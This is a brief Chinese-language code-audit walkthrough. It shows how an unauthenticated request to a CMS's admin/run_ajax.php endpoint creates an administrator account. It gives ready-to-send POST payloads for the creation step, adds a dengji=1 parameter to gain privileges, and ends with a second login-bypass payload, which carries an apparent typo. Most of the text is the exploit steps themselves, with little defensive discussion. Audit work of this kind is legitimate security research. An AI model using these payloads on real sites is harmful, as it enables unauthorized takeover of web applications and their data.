前台未授权添加管理员
一、用seay代码审计系统,自动审计代码,发现可疑代码
二、查看代码,并分析看看
发现可疑参数mima和guanliyuan,即密码和管理员,
构造URL
/cms/cms/admin/run_ajax.php?run=admin
构造payload
mima=haha123&guanliyuan=haha
三、使用hackbar插件执行payload
发现返回一个值为5
尝试用构造的管理员用户和密码登录看看
发现权限不足无法登录,这里有两种方法解决
第一种
payload参数加入&dengji=1
mima=haha123&guanliyuan=haha&dengji=1
成功获取权限
第二种
分析代码,分析可以通过其他参数绕过
构造payload
/cms/cms/admin/run_ajax.php?run=login
guanliyuan=haha$pwd=haha123
执行看看
刷新发现成功进入后台